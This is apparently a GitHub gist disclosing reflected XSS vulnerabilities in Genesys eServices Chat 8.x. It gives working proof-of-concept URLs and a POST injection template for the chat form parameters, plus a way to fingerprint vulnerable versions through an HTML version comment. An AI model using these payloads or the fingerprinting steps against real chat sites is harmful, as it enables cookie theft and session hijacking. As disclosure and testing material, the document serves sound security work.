/Vulnerability in Genesys eServices Chat 8.x.x
Secret
Created Oct 15, 2019
| Hi for all, | |
| My name is Luis Eduardo Jácome V.(a.k.a Mortal_Poison) and I find a vulnerability(gXSS and pXSS) in Genesys eServices Chat that affects the versions 8.x.x. | |
| First of all, if you find Genesys eServices Chat with "<!-- Version 8.1.200.03 -->" in the HTML Source, is vulnerable: | |
| A small PoC(for versions 8.1.x): | |
| https://example.com/HtmlChatPanel.jsp?Email=%3C/Script/%3E%3CScript/%3E(confirm)(document.cookie)%3C/Script/%3E | |
| http://example.com/HtmlChatFrameSet.jsp?email=%3C/Script/%3E%3CScript/%3E(confirm)(1)%3C/Script/%3E | |
| https://example.com/HtmlChatPanel.jsp?ActionColor=%3C/Script/%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E&ClientNickNameColor=%3C/SCRIPT/%3E&AgentNickNameColor=008000&ClientMessageColor=1532a0&AgentMessageColor=708090&Logo=.%2FResource%2FImages%2Flogo.jpg&FontSize=3&FontName=arial&ShowSmiles=1&BackgroundColor=FFFFFF | |
| The problem is that application not sanitize correctly the "values" of form(HtmlChatFrameSet.jsp and/or HtmlChatPanel.jsp). | |
| The file changes with respect to the version of Genesys eServices Chat. However, in any of the versions, the form is not validated. | |
| For versions with HTML Source "<!-- Version 8.1.000.07 -->", you can execute the next payload: | |
| https://example.com/HtmlChatPanel.jsp?ActionColor=%3C/Script/%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E&ClientNickNameColor=%3C/SCRIPT/%3E&AgentNickNameColor=008000&ClientMessageColor=1532a0&AgentMessageColor=708090&Logo=.%2FResource%2FImages%2Flogo.jpg&FontSize=3&FontName=arial&ShowSmiles=1&BackgroundColor=FFFFFF | |
| If the request is made by POST method, you should see something like the following (may vary, depending on the fields of the form): | |
| cmd=connect&chat_alias=&first_name=null&last_name=null&email_address=%INJECT_HERE%&celular=null&subject=null&msg2send=&secure_key=&user_id=&script_pos=&session_id=&timeZoneOffset=-300 | |
| In the part of %Inject_Here% you have to inject the malicious payload as for example: </Script/><Script/>(confirm)(1)</Script/> | |
| You must insert it without the "%". | |
| Remember that you must capture it with an application that intercepts requests, in my case, BurpSuite. | |
| The product is used by many companies, however, not all are indexed by search engines. | |
| https://example.com/HtmlChatPanel.jsp?ActionColor=080008&ClientNickNameColor=000019&AgentNickNameColor=0a82d8&ClientMessageColor=030717&AgentMessageColor=0074ce&Logo=https%3A%2F%2Fcontact.falabella.com%2FWebAPI812%2FSODIMAC_AR%2FChat%2FResources%2FImages%2Flogo.jpg&FontSize=13px&FontName=arial&ShowSmiles=0&BackgroundColor=FFFFFF | |
| Contact: | |
| Twitter: @Mortal_Poison_ | |
| Youtube: https://youtube.com/XecureLabs | |
| Web Page: https://xecure-labs.com | |
| Affected versions: | |
| Genesys eServices Chat 8.x.x | |
| Tested on: | |
| Firefox 50.0 and 60.0 | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment